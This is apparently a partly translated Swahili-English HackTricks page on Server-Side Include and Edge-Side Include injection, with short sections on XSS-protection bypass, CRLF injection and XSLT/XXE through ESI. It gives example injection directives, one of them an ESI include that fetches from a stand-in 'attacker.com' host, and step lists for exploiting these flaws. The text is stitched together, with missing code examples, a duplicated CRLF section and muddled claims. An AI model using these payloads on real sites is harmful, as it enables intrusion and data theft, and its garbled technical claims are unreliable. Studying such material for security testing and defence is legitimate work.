<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong><ahref="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
* Ikiwa unataka kuona **kampuni yako inatangazwa katika HackTricks** au **kupakua HackTricks katika PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
SSI (Uingizaji wa Upande wa Seva) ni maagizo ambayo **hupachikwa kwenye kurasa za HTML, na kuhesabiwa kwenye seva** wakati kurasa zinahudumiwa. Inakuwezesha **kuongeza maudhui yanayozalishwa kwa kudumu** kwenye ukurasa wa HTML uliopo, bila kuhudumia ukurasa mzima kupitia programu ya CGI, au teknolojia nyingine ya kudumu.\
Kwa mfano, unaweza kuweka agizo kwenye ukurasa wa HTML uliopo, kama vile:
Uamuzi wa lini kutumia SSI, na lini kuwa na ukurasa wako uliotengenezwa kabisa na programu fulani, kawaida ni suala la sehemu ngapi ya ukurasa ni ya kudumu, na sehemu ngapi inahitaji kuhesabiwa upya kila wakati ukurasa unahudumiwa. SSI ni njia nzuri ya kuongeza vipande vidogo vya habari, kama vile wakati wa sasa - kama inavyoonyeshwa hapo juu. Lakini ikiwa sehemu kubwa ya ukurasa wako inazalishwa wakati unahudumiwa, unahitaji kutafuta suluhisho lingine.
To check for Server-Side Inclusion (SSI) and Edge-Side Inclusion (ESI) Injection vulnerabilities, you can follow these steps:
1.**Identify the target**: Determine the target website or application that you want to test for SSI or ESI Injection vulnerabilities.
2.**Inspect the source code**: Analyze the source code of the target application to identify any potential SSI or ESI injection points. Look for server-side scripting languages like PHP, ASP, or JSP, as they are commonly used for SSI or ESI.
3.**Test for SSI Injection**: Inject SSI directives into user-controllable input fields, such as URL parameters or form inputs, to see if they are processed by the server. Use SSI directives like `<!--#include virtual="file.txt" -->` to include external files or execute commands.
4.**Test for ESI Injection**: Inject ESI directives into user-controllable input fields, such as URL parameters or form inputs, to see if they are processed by the server. Use ESI directives like `<esi:include src="http://attacker.com/malicious.xml" />` to include external content or execute commands.
5.**Observe the response**: Analyze the server's response to determine if the injected SSI or ESI directives are executed or if any error messages or unusual behavior occurs.
6.**Exploit the vulnerability**: If the SSI or ESI injection is successful, try to exploit the vulnerability further by including sensitive files, executing commands, or accessing restricted areas of the application.
7.**Report and mitigate**: Document your findings and report them to the appropriate parties. Provide recommendations on how to mitigate the SSI or ESI Injection vulnerabilities, such as input validation and output encoding.
By following these steps, you can effectively test for and exploit Server-Side Inclusion and Edge-Side Inclusion Injection vulnerabilities in web applications.
Kuna tatizo la **kukusanya habari au programu za kibinafsi** kama sehemu ya yaliyomo inaweza **kubadilika** kwa wakati ujao yaliyomo inapopatikana tena. Hii ndio **ESI** inatumika, kuonyesha kutumia vitambulisho vya ESI **yaliyomo ya kibinafsi inayohitaji kuzalishwa** kabla ya kutuma toleo la hifadhi.\
Ikiwa **mshambuliaji** anaweza **kuingiza kialamishi cha ESI** ndani ya yaliyomo ya hifadhi, basi, anaweza kuweza **kuingiza yaliyomo yoyote** kwenye hati kabla haijatumwa kwa watumiaji.
[GoSecure iliumba](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/) jedwali ili kuelewa mashambulizi yanayowezekana ambayo tunaweza kujaribu dhidi ya programu tofauti zinazoweza kusaidia ESI, kulingana na kazi inayoungwa mkono:
* **Includes**: Inasaidia agizo la `<esi:includes>`
* **Vars**: Inasaidia agizo la `<esi:vars>`. Inatumika kwa kuzunguka Filters za XSS
* **Cookie**: Vidakuzi vya hati vinapatikana kwa injini ya ESI
* **Upstream Headers Inahitajika**: Programu mbadala hazitaprocess taarifa za ESI isipokuwa programu ya juu inatoa vichwa vya habari
* **Host Allowlist**: Katika kesi hii, ESI inajumuisha inawezekana tu kutoka kwa seva zilizoruhusiwa, ikifanya SSRF, kwa mfano, iwezekane tu dhidi ya seva hizo
Some web applications implement client-side XSS protection mechanisms to prevent the execution of malicious scripts in the browser. These protections are usually implemented using Content Security Policy (CSP) headers or JavaScript libraries like DOMPurify.
However, it is possible to bypass these client-side XSS protections by finding and exploiting vulnerabilities in the server-side code. This can be done by injecting malicious code that will be executed on the server and then reflected back to the client.
##### Exploitation:
To bypass client XSS protection, you can try the following techniques:
1. Server-Side Inclusion (SSI) Injection: If the web application uses Server-Side Includes (SSI) to dynamically include content, you can try injecting malicious code into the included file. This code will be executed on the server and then reflected back to the client, bypassing the client-side XSS protection.
2. Edge-Side Includes (ESI) Injection: If the web application uses Edge-Side Includes (ESI) to include content from different sources, you can try injecting malicious code into the included content. This code will be executed on the server and then reflected back to the client, bypassing the client-side XSS protection.
##### Prevention:
To prevent bypassing client XSS protection, you should:
- Implement server-side input validation and sanitization to prevent injection attacks.
- Use a web application firewall (WAF) to detect and block malicious requests.
- Regularly update and patch the server-side code to fix any vulnerabilities that could be exploited.
- Educate developers about secure coding practices and the risks associated with XSS attacks.
CRLF (Carriage Return Line Feed) is a special character sequence that represents the end of a line in various operating systems, including Windows. It consists of two characters: a carriage return (CR) and a line feed (LF).
In the context of web security, CRLF injection refers to a type of attack where an attacker injects CRLF characters into user input fields or HTTP headers to manipulate the behavior of the web application or server. This can lead to various security vulnerabilities, such as HTTP response splitting, session hijacking, or server-side request forgery.
To prevent CRLF injection attacks, it is important to properly validate and sanitize user input, especially when it is used in HTTP headers or other sensitive parts of the application. Additionally, web developers should ensure that the application's response headers are correctly encoded to prevent any unintended interpretation of CRLF characters.
By understanding CRLF injection and implementing appropriate security measures, web applications can be better protected against this type of attack.
Kuna kosa la CRLF (Carriage Return Line Feed) katika kazi ya kuongeza kichwa kwenye tovuti. Kosa hili linaweza kusababisha mashambulizi ya kuingiza maudhui kwenye kichwa cha ukurasa. Shambulio hili linaweza kusababisha athari mbaya kama vile kuvuja kwa habari nyeti, kutekelezwa kwa msimbo wa JavaScript haramu, au hata kudhibitiwa kwa seva.
Ili kuthibitisha uwepo wa kosa hili, unaweza kujaribu kuongeza herufi za CRLF (%0d%0a) kwenye kichwa cha ombi la HTTP. Ikiwa herufi hizo zinaonekana kwenye kichwa cha ukurasa uliopokelewa, basi kuna uwezekano wa kufanya mashambulizi ya CRLF.
##### Mashambulizi
Mashambulizi ya CRLF yanaweza kufanywa kwa kuingiza maudhui haramu kwenye kichwa cha ukurasa. Hii inaweza kusababisha matokeo mbalimbali kama vile kuvuja kwa habari nyeti, kutekelezwa kwa msimbo wa JavaScript haramu, au hata kudhibitiwa kwa seva.
##### Kinga
Ili kuzuia mashambulizi ya CRLF, ni muhimu kufanya ukaguzi wa kina wa kuingiza kichwa cha ukurasa. Hakikisha kuondoa herufi za CRLF kutoka kwa data ya kuingiza kabla ya kuionyesha kwenye ukurasa. Pia, tumia vifaa vya usalama kama vile WAF (Web Application Firewall) ili kuzuia mashambulizi ya CRLF.
Kwa kutoa thamani ya `xslt` kwa parameter ya _dca_, inawezekana kuweka **`eXtensible Stylesheet Language Transformations (XSLT)`** kulingana na ESI. Uingizaji huo husababisha HTTP surrogate kupata faili za XML na XSLT, ambapo XSLT inachuja XML. Faili za XML kama hizo zinaweza kutumiwa kwa mashambulizi ya _XML External Entity (XXE)_, kuruhusu wadukuzi kutekeleza mashambulizi ya SSRF. Hata hivyo, matumizi ya njia hii ni mdogo kwani ESI tayari inatumika kama vector ya SSRF. Kutokana na ukosefu wa msaada katika maktaba ya Xalan, DTD za nje hazipangwi, hivyo kuzuia uchimbaji wa faili za ndani.
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong><ahref="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.